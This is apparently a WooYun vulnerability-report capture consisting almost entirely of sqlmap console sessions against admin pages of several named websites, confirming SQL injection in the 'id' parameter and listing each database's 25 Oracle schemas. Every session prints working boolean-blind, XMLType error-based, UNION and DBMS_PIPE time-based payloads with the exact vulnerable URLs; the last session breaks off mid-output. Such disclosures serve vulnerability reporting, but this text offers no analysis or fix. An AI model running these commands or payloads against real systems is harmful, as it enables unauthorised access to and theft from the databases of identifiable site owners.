WooYun.org

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?
lb=save&id=241" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:13:44
[07:13:44] [INFO] resuming back-end DBMS 'oracle'
[07:13:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lb=save&id=241 AND 5686=5686
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: lb=save&id=241 AND 9249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(114)||CHR(118)||CHR(99)||CHR(58)||(SELECT (CASE WHEN (9249=9249) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(113)||CHR(104)||CHR(117)||CHR(58)||CHR(62))) FROM
DUAL)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: lb=save&id=-4202 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(114)||CH
R(118)||CHR(99)||CHR(58)||CHR(98)||CHR(88)||CHR(74)||CHR(110)||CHR(102)||CHR(111
)||CHR(78)||CHR(118)||CHR(115)||CHR(71)||CHR(58)||CHR(113)||CHR(104)||CHR(117)||
CHR(58) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: lb=save&id=241 AND 4485=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(86)|
|CHR(90)||CHR(117),5)
---
[07:13:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:13:44] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:13:44] [INFO] fetching database (schema) names
[07:13:44] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:13:45] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:13:45] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:13:45

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/xhzl/mg_edithy.asp?id
=3278&page=1&title=1&lx=%D0%AD%BB%E1%BC%F2%B1%A8" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:15:16
[07:15:16] [INFO] resuming back-end DBMS 'oracle'
[07:15:16] [INFO] testing connection to the target url
[07:15:16] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3278 AND 9710=9710&page=1&title=1&lx=????
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=3278 AND 5303=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||
CHR(99)||CHR(113)||CHR(58)||(SELECT (CASE WHEN (5303=5303) THEN 1 ELSE 0 END) FR
OM DUAL)||CHR(58)||CHR(119)||CHR(109)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL)&p
age=1&title=1&lx=????
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-4200 UNION ALL SELECT NULL, CHR(58)||CHR(118)||CHR(99)||CHR(113
)||CHR(58)||CHR(110)||CHR(109)||CHR(115)||CHR(65)||CHR(70)||CHR(115)||CHR(101)||
CHR(119)||CHR(120)||CHR(99)||CHR(58)||CHR(119)||CHR(109)||CHR(114)||CHR(58), NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&title=1&lx
=????
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=3278 AND 5184=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(106)||CHR(
101)||CHR(65),5)&page=1&title=1&lx=????
---
[07:15:16] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:15:16] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:15:16] [INFO] fetching database (schema) names
[07:15:17] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:15:17] [INFO] fetched data logged to text files under 'C:\tools\SQLMAP~1\SQL
MAP~1\Bin\output\jh.zjmy.net'

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/cp/gq_edit.asp?id=351
11&cz=&page=1" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:16:45
[07:16:45] [INFO] resuming back-end DBMS 'oracle'
[07:16:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=35111' AND 6782=6782 AND 'AORJ'='AORJ&cz=&page=1
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=35111' AND 7435=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)|
|CHR(113)||CHR(100)||CHR(58)||(SELECT (CASE WHEN (7435=7435) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(106)||CHR(111)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)
 AND 'sPGU'='sPGU&cz=&page=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 50 columns
    Payload: id=-8412' UNION ALL SELECT NULL, NULL, CHR(58)||CHR(97)||CHR(113)||
CHR(100)||CHR(58)||CHR(117)||CHR(119)||CHR(119)||CHR(88)||CHR(110)||CHR(89)||CHR
(103)||CHR(106)||CHR(115)||CHR(113)||CHR(58)||CHR(106)||CHR(111)||CHR(117)||CHR(
58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &cz=&page=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=35111' AND 2969=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(77)||CHR
(82)||CHR(105),5) AND 'SzOc'='SzOc&cz=&page=1
---
[07:16:45] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:16:45] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:16:45] [INFO] fetching database (schema) names
[07:16:45] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:16:46] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:16:46] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:16:46

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/zczc/mg_edithy.asp?id
=45910&page=1&title=1&lx=--&mc=" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:19:07
[07:19:07] [INFO] resuming back-end DBMS 'oracle'
[07:19:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=45910 AND 1182=1182&page=1&title=1&lx=--&mc=
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=45910 AND 1583=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)|
|CHR(108)||CHR(112)||CHR(58)||(SELECT (CASE WHEN (1583=1583) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(105)||CHR(121)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL)
&page=1&title=1&lx=--&mc=
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-4007 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 NULL, NULL, CHR(58)||CHR(116)||CHR(108)||CHR(112)||CHR(58)||CHR(100)||CHR(103)|
|CHR(89)||CHR(73)||CHR(65)||CHR(120)||CHR(113)||CHR(83)||CHR(70)||CHR(78)||CHR(5
8)||CHR(105)||CHR(121)||CHR(114)||CHR(58), NULL, NULL, NULL, NULL, NULL FROM DUA
L-- &page=1&title=1&lx=--&mc=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=45910 AND 4688=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(102)||CHR(
86)||CHR(115),5)&page=1&title=1&lx=--&mc=
---
[07:19:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:19:07] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:19:07] [INFO] fetching database (schema) names
[07:19:07] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:19:07] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:19:07] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:19:07

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/zczc/mg_editwz.asp?id
=475&page=1&title=&mc=%D3%D1%C7%E9%C1%B4%BD%D3&ljlx=" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:20:47
[07:20:48] [INFO] resuming back-end DBMS 'oracle'
[07:20:48] [INFO] testing connection to the target url
[07:20:48] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=475 AND 6601=6601&page=1&title=&mc=????????&ljlx=
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=475 AND 9996=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||C
HR(114)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (9996=9996) THEN 1 ELSE 0 END) FRO
M DUAL)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL)&pa
ge=1&title=&mc=????????&ljlx=
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=-1476 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(109)||CHR(114)||
CHR(97)||CHR(58)||CHR(86)||CHR(79)||CHR(65)||CHR(106)||CHR(102)||CHR(114)||CHR(1
16)||CHR(118)||CHR(111)||CHR(101)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(58
), NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&title=&mc=??????
??&ljlx=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=475 AND 2336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(119)||CHR(1
08)||CHR(80),5)&page=1&title=&mc=????????&ljlx=
---
[07:20:48] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:20:48] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:20:48] [INFO] fetching database (schema) names
[07:20:48] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:20:48] [INFO] fetched data logged to text files under 'C:\tools\SQLMAP~1\SQL
MAP~1\Bin\output\jh.zjmy.net'
[*] shutting down at 07:20:48

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/ybry/mg_edithy.asp?id
=22325&page=1&title=1&lx=0050002&mc=%B9%A4%D7%F7%D1%A7%CF%B0" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:22:02
[07:22:02] [INFO] resuming back-end DBMS 'oracle'
[07:22:02] [INFO] testing connection to the target url
[07:22:02] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=22325 AND 7867=7867&page=1&title=1&lx=0050002&mc=??????
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=22325 AND 1661=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(101)|
|CHR(122)||CHR(99)||CHR(58)||(SELECT (CASE WHEN (1661=1661) THEN 1 ELSE 0 END) F
ROM DUAL)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL)&
page=1&title=1&lx=0050002&mc=??????
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-7148 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CHR(58)||CHR(101)||CHR(122)||CHR(99)||CHR(58)||CHR(118)||CHR(103)||CHR(80)||CHR
(122)||CHR(69)||CHR(120)||CHR(102)||CHR(79)||CHR(86)||CHR(83)||CHR(58)||CHR(113)
||CHR(106)||CHR(112)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUA
L-- &page=1&title=1&lx=0050002&mc=??????
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=22325 AND 8726=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(109)||CHR(
114)||CHR(68),5)&page=1&title=1&lx=0050002&mc=??????
---
[07:22:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:22:02] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:22:02] [INFO] fetching database (schema) names
[07:22:02] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:22:03] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:22:03

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/xsqy/mg_edithy.asp?id
=1907&page=1&title=1&lx=%BB%E1%D4%B1%B7%E7%B2%C9" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:23:17
[07:23:17] [INFO] resuming back-end DBMS 'oracle'
[07:23:17] [INFO] testing connection to the target url
[07:23:17] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
[07:23:17] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1907 AND 7746=7746&page=1&title=1&lx=??????
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=1907 AND 5282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(108)||
CHR(101)||CHR(110)||CHR(58)||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END) F
ROM DUAL)||CHR(58)||CHR(105)||CHR(113)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)&
page=1&title=1&lx=??????
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-5272 UNION ALL SELECT NULL, NULL, NULL, CHR(58)||CHR(108)||CHR(
101)||CHR(110)||CHR(58)||CHR(109)||CHR(85)||CHR(105)||CHR(118)||CHR(89)||CHR(83)
||CHR(100)||CHR(115)||CHR(113)||CHR(116)||CHR(58)||CHR(105)||CHR(113)||CHR(117)|
|CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&tit
le=1&lx=??????
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=1907 AND 1792=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(89)||CHR(99
)||CHR(107),5)&page=1&title=1&lx=??????
---
[07:23:17] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:23:17] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:23:17] [INFO] fetching database (schema) names
[07:23:18] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:23:18] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[07:23:18] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:23:18

[root@Hacker~]# Sqlmap -u "http://www.linhaihome.com/admin_manage/system/mg_edit
wz.asp?lb=save&id=241" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:27:06
[07:27:06] [INFO] resuming back-end DBMS 'oracle'
[07:27:06] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lb=save&id=241 AND 6573=6573
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: lb=save&id=241 AND 3125=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(120)||CHR(106)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3125=3125) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(115)||CHR(114)||CHR(102)||CHR(58)||CHR(62))) FROM
DUAL)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: lb=save&id=-5471 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(120)||CH
R(106)||CHR(98)||CHR(58)||CHR(74)||CHR(84)||CHR(118)||CHR(97)||CHR(72)||CHR(78)|
|CHR(90)||CHR(106)||CHR(81)||CHR(87)||CHR(58)||CHR(115)||CHR(114)||CHR(102)||CHR
(58) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: lb=save&id=241 AND 7336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(105)
||CHR(99)||CHR(76),5)
---
[07:27:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:27:07] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:27:07] [INFO] fetching database (schema) names
[07:27:07] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:27:07] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:27:07] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.linhaihome.com'
[*] shutting down at 07:27:07

[root@Hacker~]# Sqlmap -u "http://www.lqmyjj.com//admin_manage/system/mg_editwz.
asp?lb=save&id=241" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:29:17
[07:29:18] [INFO] resuming back-end DBMS 'oracle'
[07:29:18] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lb=save&id=241 AND 8083=8083
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: lb=save&id=241 AND 2858=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(111)||CHR(114)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2858=2858) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(108)||CHR(105)||CHR(112)||CHR(58)||CHR(62))) FROM
DUAL)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: lb=save&id=-9735 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(111)||CH
R(114)||CHR(98)||CHR(58)||CHR(109)||CHR(113)||CHR(112)||CHR(85)||CHR(79)||CHR(99
)||CHR(90)||CHR(109)||CHR(80)||CHR(73)||CHR(58)||CHR(108)||CHR(105)||CHR(112)||C
HR(58) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: lb=save&id=241 AND 2218=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111
)||CHR(106)||CHR(118),5)
---
[07:29:18] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:29:18] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[07:29:18] [INFO] fetching database (schema) names
[07:29:18] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:29:18] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:29:18] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.lqmyjj.com'
[*] shutting down at 07:29:18

[root@Hacker~]# Sqlmap -u "http://www.sxjhjj.com/admin_manage/system/mg_editwz.a
sp?lb=save&id=241" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:31:40
[07:31:40] [INFO] resuming back-end DBMS 'oracle'
[07:31:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lb=save&id=241 AND 8957=8957
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: lb=save&id=241 AND 9577=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(104)||CHR(102)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (9577=9577) THEN 1 ELSE 0
 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(100)||CHR(98)||CHR(58)||CHR(62))) FROM
DUAL)
    Type: UNION query
